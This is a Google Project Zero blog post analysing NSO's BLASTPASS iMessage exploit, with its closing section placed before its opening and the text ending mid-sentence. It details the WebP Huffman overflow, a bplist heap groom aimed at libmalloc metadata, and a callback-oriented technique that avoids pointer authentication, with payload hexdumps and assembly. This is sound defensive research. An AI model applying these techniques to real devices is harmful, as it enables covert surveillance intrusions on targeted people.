0x0000 0x8027 This has the effect of overwriting all but the last 16 bytes of the blue allocation with zeros, then overwriting the three least-significant bytes of the second-to-last pointer-sized value with 0x10 00 00; which, if that memory happened to contain a pointer, has the effect of "shifting" that pointer down to the nearest 16MB boundary, then adding 0x10 bytes! (For those who saw my 2024 Offensivecon talk, this was the missing link between the overlapping allocations and code execution I mentioned.) As mentioned earlier, that blue allocation starting with 0x0003 is the backing buffer of a CFSet object from the bplist inside the WebP MakerNote. The set is constructed in a very precise fashion such that the target pointer (the one to be rounded down) ends up as the second-to-last pointer in the backing buffer. The 1MB object is then also groomed such that it falls on a 16MB boundary below the object which the CFSet entry originally points to. Then when that CFSet is destructed it calls CFRelease on each object, causing the fake CFReadStream destructor to run.Caveat II: ASLR We've looked at the whole flow from huffman table overflow to CFRelease being invoked on a fake CFReadStream — but there's still stuff missing. The second open question I discussed earlier was ASLR. I had theorised that maybe it used a trick like a universal gadget, but is that the case? In addition to the samples, I was also able to obtain a number of crash logs from failed exploit attempts where those samples were thrown, which meant I could figure out the ASLR slide of the MessagesBlastDoorService when the exploit failed. In combination with the target device and exact OS build (also contained in the crash log) I could then obtain the matching dyld_shared_cache, subtract the runtime ASLR slide from a bunch of the pointer-looking things in the 1MB object and take a look at them. The simple answer is: the 1MB object contains a large number of hardcoded, pre-slid, valid pointers. There's no weird machine, tricks or universal gadget here. By the time the PKPass is built and sent by the attackers they already know both the target device type and build as well as the runtime ASLR slide of the MessagesBlastDoorService... Based on analysis by iVerify, as well as analysis of earlier exploit chains published by Citizen Lab, my current working theory is that the large amount of HomeKit traffic seen in those cases is likely a separate ASLR/memory disclosure exploit.Caveat III: Pointer Authentication In the years since PAC was introduced we've seen a whole spectrum of interesting ways to either defeat, or just avoid, PAC. So what did these attackers do? To understand that let's follow the CFReadStream destruction code closely. (All these code snippets are from the most recently available version of CF from 2015, but the code doesn't seem to have changed much.) Here's the definition of the CFReadStream: static const CFRuntimeClass __CFReadStreamClass = {     0,     "CFReadStream",     NULL,      // init     NULL,      // copy     __CFStreamDeallocate,     NULL,     NULL,     NULL,      // copyHumanDesc     __CFStreamCopyDescription }; When a CFReadStream is passed to CFRelease, it will call __CFStreamDeallocate: static void __CFStreamDeallocate(CFTypeRef cf) {   struct _CFStream *stream = (struct _CFStream *)cf;   const struct _CFStreamCallBacks *cb =     _CFStreamGetCallBackPtr(stream);   CFAllocatorRef alloc = CFGetAllocator(stream);   _CFStreamClose(stream); _CFStreamGetCallBackPtr just returns the CFStream's callBacks field: CF_INLINE const struct _CFStreamCallBacks *_CFStreamGetCallBackPtr(struct _CFStream *stream) {     return stream->callBacks; } Here's _CFStreamClose: CF_PRIVATE void _CFStreamClose(struct _CFStream *stream) {   CFStreamStatus status = _CFStreamGetStatus(stream);   const struct _CFStreamCallBacks *cb =     _CFStreamGetCallBackPtr(stream);   if (status == kCFStreamStatusNotOpen ||        status == kCFStreamStatusClosed ||        (status == kCFStreamStatusError &&         __CFBitIsSet(stream->flags, HAVE_CLOSED)       ))   {     // Stream is not open from the client's perspective;     // do not callout and do not update our status to "closed"     return;   }   if (! __CFBitIsSet(stream->flags, HAVE_CLOSED)) {         __CFBitSet(stream->flags, HAVE_CLOSED);         __CFBitSet(stream->flags, CALLING_CLIENT);     if (cb->close) {       cb->close(stream, _CFStreamGetInfoPointer(stream));     } _CFStreamGetStatus extracts the status bitfield from the flags field: #define __CFStreamGetStatus(x) __CFBitfieldGetValue((x)->flags, MAX_STATUS_CODE_BIT, MIN_STATUS_CODE_BIT) Looking at the 1MB object again the flags field is the first non-base field: 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......| 00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............| 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....| 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| That gives a status code of 0x1f with all the other flags bits clear. This gets through the two conditional branches to reach this close callback call:   if (cb->close) {     cb->close(stream, _CFStreamGetInfoPointer(stream));   } At this point we need to switch to looking at the assembly to see what's really happening: __CFStreamClose var_30= -0x30 var_20= -0x20 var_10= -0x10 var_s0=  0 PACIBSP STP             X24, X23, [SP,#-0x10+var_30]! STP             X22, X21, [SP,#0x30+var_20] STP             X20, X19, [SP,#0x30+var_10] STP             X29, X30, [SP,#0x30+var_s0] ADD             X29, SP, #0x30 MOV             X19, X0 BL              __CFStreamGetStatus CBZ             X0, loc_187076958 The fake CFReadStream is the first argument to this function, so passed in the X0 register. It's then stored into X19 so it survives the call to __CFStreamGetStatus. Skipping ahead past the flag checks we reach the callback callsite (this is also the crash site seen earlier): LDR             X8, [X19,#0x30] ... LDR             X8, [X8,#0x58] CBZ             X8, loc_187076758 LDR             X1, [X19,#0x28] MOV             X0, X19 BLRAAZ          X8 Let's walk through each instruction in turn there: First it loads the 64-bit value from X19+0x30 into X8: LDR             X8, [X19,#0x30] Looking at the hexdump of the 1MB object above this will load the value 0x25846ec20. From the crash reports we know the runtime ASLR slide of the MessagesBlastDoorService when this exploit was thrown was 0x3A8D0000, so subtracting that we can figure out where in the shared cache this pointer should point: 0x25846ec20-0x3A8D0000=0x21DB9EC20 It points into the __const segment of the TextToSpeechMauiSupport library in the shared cache: The next instruction adds 0x58 to that TextToSpeechMauiSupport pointer and reads a 64-bit value from there: LDR             X8, [X8,#0x58] // x8 := [0x21DB9EC20+0x58] This loads the pointer to the function _DataSectionWriter_CommitDataBlock from 0x21DB9EC78. IDA is simplifying something for us here: the function pointer loaded there is actually signed with the A-family instruction key with a zero context. This signing happens transparently (either during load or when the page is faulted in). The remaining four instructions then check that the pointer wasn't NULL, load X1 from offset +0x28 in the fake 1MB object, move the pointer to the fake object back into X0 and call the PAC'ed _DataSectionWriter_CommitDataBlock function pointer via BLRAAZ: CBZ             X8, loc_187076758 LDR             X1, [X19,#0x28] MOV             X0, X19 BLRAAZ          X8 Callback-Oriented Programming A well-known attack against PAC is to swap two valid, PAC'ed pointers which are signed in the same way but point to different places (e.g. swapping two function pointers with different semantics, allowing you to exploit those semantic differences). Since a large number of PAC-protected pointers are signed with the A-family instruction key with a zero-context value, there are a large number of pointers to choose from. "Just" having an ASLR defeat shouldn't be enough to achieve this though; surely you'd need to disclose the actual PAC'ed pointer value? But that's not what happened above. Notice that the CFStream objects don't directly contain the callback function pointers — there's an extra level of indirection. The CFStream object contains a pointer to a callback structure, and that structure has the PAC'd function pointers. And crucially: that first pointer, the one to the callbacks structure, isn't protected by PAC. This means that the attackers can freely swap pointers to callback structures, operating one-level removed from the function pointers. This might seem like a severe constraint, but the dyld_shared_cache is vast and there are easily enough pre-existing callback structures to build a "callback-oriented JOP" chain, chaining together unsigned pointers to signed function pointers. The initial portion of the payload is a large callback-oriented JOP chain which is used to bootstrap the evaluation of the next payload stage, a large NSExpression.Similarities There are a number of similarities between this exploit chain and PWNYOURHOME, an earlier exploit also attributed by CitizenLab to NSO, described in this blog post in April 2023. That chain also had an initial stage targeting HomeKit, followed by a stage targeting MessagesBlastDoorService and also involving a MakerNote object — the Citizen Lab post claims that at the time the MakerNote was inside a PNG file. My guess would be that that PNG was being used as the delivery mechanism for the MakerNote bplist heap grooming primitives discussed in this post. Based on Citizen Lab's description it also seems like PWNYOURHOME was leveraging a similar callback-oriented JOP technique, and it seems likely that there was also a HomeKit-based ASLR disclosure. The PWNYOURHOME post has a couple of extra details around a minor fix which Apple made, preventing parsing of "certain HomeKit messages unless they arrive from a plausible source." But there still aren't enough details to figure out the underlying vulnerability or primitive. It seems likely to me that the same issue, or a variant thereof was still in use in BLASTPASS.Key material Matthias from iVerify presented an initial analysis of the NSExpression payload at BlackHat Asia in April 2024. In early July 2024, Matthias and I took a closer look at the final stages of the NSExpression payload which decrypts an AES-encrypted NSExpression and executes it. It seems very likely that the encrypted payload contains a BlastDoor sandbox escape. Although the BlastDoor sandbox profile is fairly restrictive it still allows access to a number of system services like notifyd, logd and mobilegestalt. In addition to the syscall attack surface there's also a non-trivial IOKit driver attack surface: ... (allow iokit-open-user-client         (iokit-user-client-class "IOSurfaceRootUserClient")         (iokit-user-client-class "IOSurfaceAcceleratorClient")         (iokit-user-client-class "AGXDevice")) (allow iokit-open-service) (allow mach-derive-port) (allow mach-kernel-endpoint) (allow mach-lookup         (require-all                 (require-not (global-name "com.apple.diagnosticd"))                 (require-any                         (global-name "com.apple.logd")                         (global-name "com.apple.system.notification_center")                         (global-name "com.apple.mobilegestalt.xpc")))) ... (This profile snippet was generated using the Cellebrite labs' fork of SandBlaster) In FORCEDENTRY the sandbox escape was contained directly in the NSExpression payload (though that was an escape from the less-restrictive IMTranscoderAgent sandbox). This time around it seems extra care has been taken to prevent analysis of the sandbox escape. The question is: where does the key come from? We had a few theories: Perhaps the key is just obfuscated, and by completely reversing the NSExpression payload we can find it?Perhaps the key is derived from some target-specific information?Perhaps the key was somehow delivered in some other way and can be read from inside BlastDoor? We spent a day analysing the NSExpression payload and concluded that the third theory appeared to be the correct one. The NSExpression walks up the native stack looking for the communication ports back to imagent. It then hijacks that communication, effectively taking over responsibility for parsing all subsequent incoming requests from imagent for "defusing" of iMessage payloads. The NSExpression loops 100 times, parsing incoming requests as XPC messages, reading the request xpc dictionary then the data xpc data object to get access to the raw, binary iMessage format. It waits until the device receives another iMessage with a specific format, and from that message extracts an AES key which is then used to decrypt the next NSExpression stage and evaluate it. We were unable to recover any messages with the matching format and therefore unable to analyse the next stage of the exploit.Conclusion In contrast to FORCEDENTRY, BLASTPASS's separation of the ASLR disclosure and RCE phases mitigated the need for a novel weird machine. Whilst the heap groom was impressively complicated and precise, the exploit still relied on well-known exploitation techniques. Furthermore, the MakerNote bplist groom and callback-JOP PAC defeat techniques appear to have been in use for multiple years, based on similarities with Citizenlab's blogpost in 2023, which looked at devices compromised in 2022. Enforcing much stricter requirements on the format of the bplist inside the MakerNote (for example: a size limit or a strict-parser mode which rejects duplicate keys) would seem prudent. The callback-JOP issue is likely harder to mitigate. The HomeKit aspect of the exploit chain remains mostly a mystery, but it seems very likely that it was somehow involved in the ASLR disclosure. Samuel Groß's post "A Look at iMessage in iOS 14" in 2021, mentioned that Apple added support for re-randomizing the shared cache slide of certain services. Ensuring that BlastDoor has a unique ASLR slide could be a way to mitigate this. This is the second in-the-wild NSO exploit which relied on simply renaming a file extension to access a parser in an unexpected context which shouldn't have been allowed. FORCEDENTRY had a .gif which was really a .pdf. BLASTPASS had a .png which was really a .webp. A basic principle of sandboxing is treating all incoming attacker-controlled data as untrusted, and not simply trusting a file extension. This speaks to a broader challenge in sandboxing: that current approaches based on process isolation can only take you so far. They increase the length of an exploit chain, but don't necessarily reduce the size of the initial remote attack surface. Accurately mapping, then truly reducing the scope of that initial remote attack surface should be a top priority.

https://googleprojectzero.blogspot.com/2025/03/blasting-past-webp.html
Blasting Past Webp
2025-03-26T17:30:00Z | 1743010200

An analysis of the NSO BLASTPASS iMessage exploit Posted by Ian Beer, Google Project Zero On September 7, 2023 Apple issued an out-of-band security update for iOS: Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild": "[The target was] an individual employed by a Washington DC-based civil society organization with international offices... The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim. The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim." The day before, on September 6th 2023, Apple reported a vulnerability to the WebP project, indicating in the report that they planned to ship a custom fix for Apple customers the next day. The WebP team posted their first proposed fix in the public git repo the next day, and five days after that on September 12th Google released a new Chrome stable release containing the WebP fix. Both Apple and Google marked the issue as exploited in the wild, alerting other integrators of WebP that they should rapidly integrate the fix as well as causing the security research community to take a closer look... A couple of weeks later on September 21st 2023, former Project Zero team lead Ben Hawkes (in collaboration with @mistymntncop) published the first detailed writeup of the root cause of the vulnerability on the Isosceles Blog. A couple of months later, on November 3rd, a group called Dark Navy published their first blog post: a two-part analysis (Part 1 - Part 2) of the WebP vulnerability and a proof-of-concept exploit targeting Chrome (CVE-2023-4863).   Whilst the Isosceles and Dark Navy posts explained the underlying memory corruption vulnerability in great detail, they were unable to solve another fascinating part of the puzzle: just how exactly do you land an exploit for this vulnerability in a one-shot, zero-click setup? As we'll soon see, the corruption primitive is very limited. Without access to the samples it was almost impossible to know. In mid-November, in collaboration with Amnesty International Security Lab, I was able to obtain a number of BLASTPASS PKPass sample files as well as crash logs from failed exploit attempts. This blog post covers my analysis of those samples and the journey to figure out how one of NSO's recent zero-click iOS exploits really worked. For me that journey began by immediately taking three months of paternity leave, and resumed in March 2024 where this story begins:Setting the scene For a detailed analysis of the root-cause of the WebP vulnerability and the primitive it yields, I recommend first reading the three blog posts I mentioned earlier (Isosceles, Dark Navy 1, Dark Navy 2.) I won't restate their analyses here (both because you should read their original work, and because it's quite complicated!) Instead I'll briefly discuss WebP and the corruption primitive the vulnerability yields.WebP WebP is a relatively modern image file format, first released in 2010. In reality WebP is actually two completely distinct image formats: a lossy format based on the VP8 video codec and a separate lossless format. The two formats share nothing apart from both using a RIFF container and the string WEBP for the first chunk name. From that point on (12 bytes into the file) they are completely different. The vulnerability is in the lossless format, with the RIFF chunk name VP8L. Lossless WebP makes extensive use of Huffman coding; there are at least 10 huffman trees present in the BLASTPASS sample. In the file they're stored as canonical huffman trees, meaning that only the code lengths are retained. At decompression time those lengths are converted directly into a two-level huffman decoding table, with the five largest tables all getting squeezed together into the same pre-allocated buffer. The (it turns out not quite) maximum size of these tables is pre-computed based on the number of symbols they encode. If you're up to this part and you're slightly lost, the other three blogposts referenced above explain this in detail. With control over the symbol lengths it's possible to define all sorts of strange trees, many of which aren't valid. The fundamental issue was that the WebP code only checked the validity of the tree after building the decoding table. But the pre-computed size of the decoding table was only correct for valid trees. As the Isosceles blog post points out, this means that a fundamental part of the vulnerability is that triggering the bug is detected, though after memory has been corrupted, and image parsing stops only a few lines of code later. This presents another exploitation mystery: in a zero-click context, how do you exploit a bug where every time the issue is triggered it also stops parsing any attacker-controlled data? The second mystery involves the actual corruption primitive. The vulnerability will write a HuffmanCode structure at a known offset past the end of the huffman tables buffer: // Huffman lookup table entry typedef struct {   uint8_t bits;   uint16_t value; } HuffmanCode; As DarkNavy point out, whilst the bits and value fields are nominally attacker-controlled, in reality there isn't that much flexibility. The fifth huffman table (the one at the end of the preallocated buffer, part of which can get written out-of-bounds) only has 40 symbols, limiting value to a maximum value of 39 (0x27) and bits will be between 1 and 7 (for a second-level table entry). There's a padding byte between bits and value which makes the largest value that could be written out-of-bounds 0x00270007. And it just so happens that that's exactly the value which the exploit does write — and they likely didn't have that much choice about it. There's also not much flexibility in the huffman table allocation size. The table allocation in the exploit is 12072 (0x2F28) bytes, which will get rounded up to fit within a 0x3000 byte libmalloc small region. The code lengths are chosen such that the overflow occurs like this: To summarize: The 32-bit value 0x270007 will be written 0x58 bytes past the end of a 0x3000 byte huffman table allocation. And then WebP parsing will fail, and the decoder will bail out.Déjà vu? Long-term readers of the Project Zero blog might be experiencing a sense of déjà vu at this point... haven't I already written a blog post about an NSO zero-click iPhone zero day exploiting a vulnerability in a slightly obscure lossless compression format used in an image parsed from an iMessage attachment? Indeed. BLASTPASS has many similarities with FORCEDENTRY, and my initial hunch (which turned out to be completely wrong) was that this exploit might take a similar approach to build a weird machine using some fancier WebP features. To that end I started out by writing a WebP parser to see what features were actually used.Transformation In a very similar fashion to JBIG2, WebP also supports invertible transformations on the input pixel data: My initial theory was that the exploit might operate in a similar fashion to FORCEDENTRY and apply sequences of these transformations outside of the bounds of the image buffer to build a weird machine. But after implementing enough of the WebP format in python to parse every bit of the VP8L chunk it became pretty clear that it was only triggering the Huffman table overflow and nothing more. The VP8L chunk was only 1052 bytes, and pretty much all of it was the 10 Huffman tables needed to trigger the overflow.What's in a pass? Although BLASTPASS is often referred to as an exploit for "the WebP vulnerability", the attackers don't actually just send a WebP file (even though that is supported in iMessage). They send a PassKit PKPass file, which contains a WebP. There must be a reason for this. So let's step back and actually take a look at one of the sample files I received: 171K sample.pkpass $ file sample.pkpass sample.pkpass: Zip archive data, at least v2.0 to extract, compression method=deflate There are five files inside the PKPass zip archive: 60K  background.png 5.5M logo.png 175B manifest.json 18B  pass.json 3.3K signature The 5.5MB logo.png is the WebP image, just with a .png extension instead of .webp: $ file logo.png: logo.png:         RIFF (little-endian) data, Web/P image The closest thing to a specification for the PKPass format appears to be the Wallet Developer Guide, and whilst it doesn't explicitly state that the .png files should actually be Portable Network Graphics images, that's presumably the intention. This is yet another parallel with FORCEDENTRY, where a similar trick was used to reach the PDF parser when attempting to parse a GIF. PKPass files require a valid signature which is contained in manifest.json and signature. The signature has a presumably fake name and more timestamps indicating that the PKPass is very likely being generated and signed on the fly for each exploit attempt. pass.json is just this: {"pass": "PKpass"} Finally background.png: $ file background.png background.png: TIFF image data, big-endian, direntries=15, height=16, bps=0, compression=deflate, PhotometricIntepretation=RGB, orientation=upper-left, width=48 Curious. Another file with a misleading extension; this time a TIFF file with a .png extension. We'll return to this TIFF later in the analysis as it plays a critical role in the exploit flow, but for now we'll focus on the WebP, with one short diversion:Blastdoor So far I've only mentioned the WebP vulnerability, but the Apple advisory I linked at the start of this post mentions two separate CVEs: The first, CVE-2023-41064 in ImageIO, is the WebP bug (though just to keep things confusing with a different CVE from the upstream WebP fix which is CVE-2023-4863 - they're the same vulnerability though). The second, CVE-2023-41061 in "Wallet", is described in the Apple advisory as: "A maliciously crafted attachment may result in arbitrary code execution". The Isosceles blog post hypothesises: "Citizen Lab called this attack "BLASTPASS", since the attackers found a clever way to bypass the "BlastDoor" iMessage sandbox. We don't have the full technical details, but it looks like by bundling an image exploit in a PassKit attachment, the malicious image would be processed in a different, unsandboxed process. This corresponds to the first CVE that Apple released, CVE-2023-41061." This theory makes sense — FORCEDENTRY had a similar trick where the JBIG2 bug was actually exploited inside IMTranscoderAgent instead of the more restrictive sandbox of BlastDoor. But in all my experimentation, as well as all the in-the-wild crash logs I've seen, this hypothesis doesn't seem to hold. The PKPass file and the images enclosed within do get parsed inside the BlastDoor sandbox and that's where the crashes occur or the payload executes — later on we'll also see evidence that the NSExpression payload which eventually gets evaluated expects to be running inside BlastDoor. My guess is that CVE-2023-41061 is more likely referring to the lax parsing of PKPasses which didn't reject images which weren't png's. In late 2024, I received another set of in-the-wild crash logs including two which do in fact strongly indicate that there was also a path to hit the WebP vulnerability in the MobileSMS process, outside the BlastDoor sandbox! Interestingly, the timestamps indicate that these devices were targeted in November 2023, two months after the vulnerability was patched. In those cases the WebP code was reached inside the MobileSMS process via a ChatKit CKPassPreviewMediaObject created by a CKAttachmentMessagePartChatItem.What's in a WebP? I mentioned that the VP8L chunk in the WebP file is only around 1KB. Yet in the file listing above the WebP file is 5.5MB! So what's in the rest of it? Expanding out my WebP parser we see that there's one more RIFF chunk: EXIF : 0x586bb8 exif is Intel byte alignment EXIF has n_entries=1 tag=8769 fmt=4 n_components=1 data=1a subIFD has n_entries=1 tag=927c fmt=7 n_components=586b8c data=2c It's a (really really huge) EXIF - the standard format which cameras use to store image metadata — stuff like the camera model, exposure time, f-stop etc. It's a tag-based format and pretty much all 5.5MB is inside one tag with the id 0x927c. So what's that? Looking through an online list of EXIF tags just below the lens FocalLength tag and above the UserComment tag we spot 0x927c: It's the very-vague-yet-fascinating sounding: "MakerNote - Manufacturer specific information." Looking to Wikipedia for some clarification on what that actually is, we learn that "the "MakerNote" tag contains information normally in a proprietary binary format." Modifying the webp parser to now dump out the MakerNote tag we see: $ file sample.makernote sample.makernote: Apple binary property list Apple's chosen format for the "proprietary binary format" is binary plist! And indeed: looking through the ImageIO library in IDA there's a clear path between the WebP parser, the EXIF parser, the MakerNote parser and the binary plist parser.unbplisting I covered the binary plist format in a previous blog post. That was the second time I'd had to analyse a large bplist. The first time (for the FORCEDENTRY sandbox escape) it was possible mostly by hand, just using the human-readable output of plutil. Last year, for the Safari sandbox escape analysis, the bplist was 437KB and I had to write a custom bplist parser to figure out what was going on. Keeping the exponential curve going this year the bplist was 10x larger again. In this case it's fairly clear that the bplist must be a heap groom - and at 5.5MB, presumably a fairly complicated one. So what's it doing?Switching Views I had a hunch that the bplist would use duplicate dictionary keys as a fundamental building block for the heap groom, but running my parser it didn't output any... until I realised that my tool stored the parsed dictionaries directly as python dictionaries before dumping them. Fixing the tools to instead keep lists of keys and values it became clear that there were duplicate keys. Lots of them: In the Safari exploit writeup I described how I used different visualisation techniques to try to explore the structure of the objects, looking for patterns I could use to simplify what was going on. In this case, modifying the parser to emit well-formed curly brackets and indentation then relying on VS Code's automatic code-folding proved to work well enough for browsing around and getting a feel for the structure of the groom object. Sometimes the right visualisation technique is sufficient to figure out what the exploit is trying to do. In this case, where the primitive is a heap-based buffer overflow, the groom will inevitably try to put two things next to each other in memory and I want to know "what two things?" But no matter how long I stared and scrolled, I couldn't figure anything out. Time to try something different.Instrumentation I wrote a small helper to load the bplist using the same API as the MakerNote parser and ran it using the Mac Instruments app: Parsing the single 5.5MB bplist causes nearly half a million allocations, churning through nearly a gigabyte of memory. Just looking through this allocation summary it's clear there's lots of CFString and CFData objects, likely used for heap shaping. Looking further down the list there are other interesting numbers: The 20'000 in the last line is far too round a number to be a coincidence. This number matches up with the number of __NSDictionaryM objects allocated: Finally, at the very bottom of the list there are two more allocation patterns which stand out: There are two sets of very large allocations: eighty 1MB allocations and 44 4MB ones. I modified my bplist tool again to dump out each unique string or data buffer, along with a count of how many times it was seen and its hash. Looking through the file listing there's a clear pattern: Object Size Count 0x3FFFFF 44 0xFFFFF 80 0x3FFF 20 0x26A9 24978 0x2554 44 0x23FF 5822 0x22A9 4 0x1FFF 2 0x1EA9 26 0x1D54 40 0x17FF 66 0x13FF 66 0x3FF 322 0x3D7 404 0xF 112882 0x8 3 There are a large number of allocations which fall just below a "round" number in hexadecimal: 0x3ff, 0x13ff, 0x17ff, 0x1fff, 0x23ff, 0x3fff... That heavily hints that they are sized to fall exactly within certain allocator size buckets. Almost all of the allocations are just filled with zeros or 'A's. But the 1MB one is quite different: $ hexdump -C 170ae757_80.bin | head -n 20 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......| 00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....| 00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......| 00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............| 00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....| 00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| * 000004b0  00 00 00 00 00 00 00 00  10 c4 31 16 02 00 00 00  |..........1.....| 000004c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| * 000004e0  02 1c 00 00 01 00 00 00  00 00 00 00 00 00 00 00  |................| 000004f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| 00000500  00 00 00 00 00 00 00 00  70 80 33 16 02 00 00 00  |........p.3.....| 00000510  b8 b5 e5 57 02 00 00 00  ff ff ff ff ff ff ff ff  |...W............| 00000520  58 c4 31 16 02 00 00 00  00 00 00 00 00 00 00 00  |X.1.............| 00000530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| * 00000550  50 75 2c 18 02 00 00 00  01 00 00 00 00 00 00 00  |Pu,.............| Further on in the hexdump of the 1MB object there's clearly an NSExpression payload - this payload is also visible just running strings on the WebP file. Matthias Frielingsdorf from iVerify gave a talk at BlackHat Asia with an initial analysis of this NSExpression payload, we'll return to that at the end of this blog post. Equally striking (and visible in the hexdump above): there are clearly pointers in there. It's too early in the analysis to know whether this is a payload which gets rebased somehow, or whether there's a separate ASLR disclosure step. On a slightly higher level this hexdump looks a little bit like an Objective-C or C++ object, though some things are strange. Why are the first 24 bytes all zero? Why isn't there an isa pointer or vtable? It looks a bit like there are a number of integer fields before the pointers, but what are they? At this stage of the analysis, I had no idea.Thinking dynamically I had tried a lot to reproduce the exploit primitives on a real device; I built tooling to dynamically generate and sign legitimate PKPass files that I could send via iMessage to test devices and I could crash a lot, but I never seemed to get very far into the exploit - the iOS version range where the heap grooming works seems to be pretty small, and I didn't have an exact device and iOS version match to test on. Regardless of what I tried: sending the original exploits via iMessage, sending custom PKPasses with the trigger and groom, rendering the WebP directly in a test app or trying to use the PassKit APIs to render the PKPass file the best I could manage dynamically was to trigger a heap metadata integrity check failure, which I assumed was indicative of the exploit failing. (Amusingly, using the legitimate APIs to render the PKPass inside an app failed with an error that the PKPass file was malformed. And indeed, the exploit sample PKPass is malformed: it's missing multiple required files. But the "secure" PKPass BlastDoor parser entrypoint (PKPassSecurePreviewContextCreateMessagesPreview) is, in this regard at least, less strict and will attempt to render an incomplete and invalid PKPass). Though getting the whole PKPass parsed was proving tricky, with a bit of reversing it was possible to call the correct underlying CoreGraphics APIs to render the WebP and also get the EXIF/MakerNote parsed. By then setting a breakpoint when the huffman tables were allocated I had hoped it would be obvious what the overflow target was. But it was actually totally unclear what the following object was: (Here X3 points to the start of the huffman tables which are 0x3000 bytes large) (lldb) x/6xg $x3+0x3000 0x112000000: 0x0000000111800000 0x0000000000000000 0x112000010: 0x00000000001a1600 0x0000000000000004 0x112000020: 0x0000000000000001 0x0000000000000019 The first qword (0x111800000) is a valid pointer, but this is clearly not an Objective-C object, nor did it seem to look like any other recognizable object or have much to do with either the bplist or WebP. But running the tests a few times, there was a curious pattern: (lldb) x/6xg $x3+0x3000 0x148000000: 0x0000000147800000 0x0000000000000000 0x148000010: 0x000000000019c800 0x0000000000000004 0x148000020: 0x0000000000000001 0x0000000000000019 The huffman table is 0x2F28 bytes, which the allocator rounds up to 0x3000. And in both of those test runs, adding the allocation size to the huffman table pointer yielded a suspiciously round number. There's no way that's a coincidence. Running a few more tests the table+0x3000 pointer is always 8MB aligned. I remembered from some presentations on the iOS userspace allocator I'd read that 8MB is a meaningful number. Here's one from Synaktiv: Or this one from Angelboy: 8MB is the size of the iOS userspace default allocator's small rack regions. It looks like they might be trying to groom the allocator not to target application-specific data but allocator metadata. Time to dive into some libmalloc internals!libmalloc I'd suggest reading the two presentations linked above for a good overview of the iOS default userspace malloc implementation. Libmalloc manages memory on four levels of abstraction. From largest to smallest those are: rack, magazine, region and block. The size split between the tiny, small and large racks depends on the platform. Almost all the relevant allocations for this exploit come from the small rack, so that's the one I'll focus on. Reading through the libmalloc source I noticed that the region trailer, whilst still called a trailer, has been now moved to the start of the region object. The small region manages memory in chunks of 8MB. That 8MB gets split up in to (for our purposes) three relevant parts: a header, an array of metadata words, then blocks of 512 bytes which form the allocations: The first 0x28 bytes are a header where the first two fields form a linked-list of small regions: typedef struct region_trailer {         struct region_trailer *prev;         struct region_trailer *next;         unsigned bytes_used;         unsigned objects_in_use;         mag_index_t mag_index;         volatile int32_t pinned_to_depot;         bool recirc_suitable;         rack_dispose_flags_t dispose_flags; } region_trailer_t; The small region manages memory in units of 512 bytes called blocks. On iOS allocations from the small region consist of contiguous runs of up to 31 blocks. Each block has an associated 16-bit metadata word called a small meta word, which itself is subdivided into a "free" flag in the most-significant bit, and a 15-bit count. To mark a contiguous run of blocks as in-use (belonging to an allocation) the first meta word has its free flags cleared and the count set to the number of blocks in the run. On free, an allocation is first placed on a lookaside list for rapid reuse without freeing. But once an allocation really gets freed the allocator will attempt to greedily coalesce neighbouring chunks. While in-use runs can never exceed 31 blocks, free runs can grow to encompass the entire region.The groom Below you can see the state of the meta words array for the small region directly following the one containing the huffman table as its last allocation: (lldb) x/200wh 0x148000028 0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000058: 0x0000 0x0003 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000 0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c 0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000 With some simple maths we can convert indexes in the meta words array into their corresponding heap pointers. Doing that it's possible to dump the memory associated with the allocations shown above. The larger 0x19, 0x18 and 0x1c allocations all seem to be generic groom allocations, but the two 0x3 block allocations appear more interesting. The first one (with the first metadata word at 0x14800005a, shown in yellow) is the code_lengths array which gets freed directly after the huffman table building fails. The blue 0x3 block run (with the first metadata word at 0x148000090) is the backing buffer for a CFSet object from the MakerNote and contains object pointers. Recall that the corruption primitive will write the dword 0x270007 0x58 bytes off the end of the 0x3000 allocation (and that allocation happens 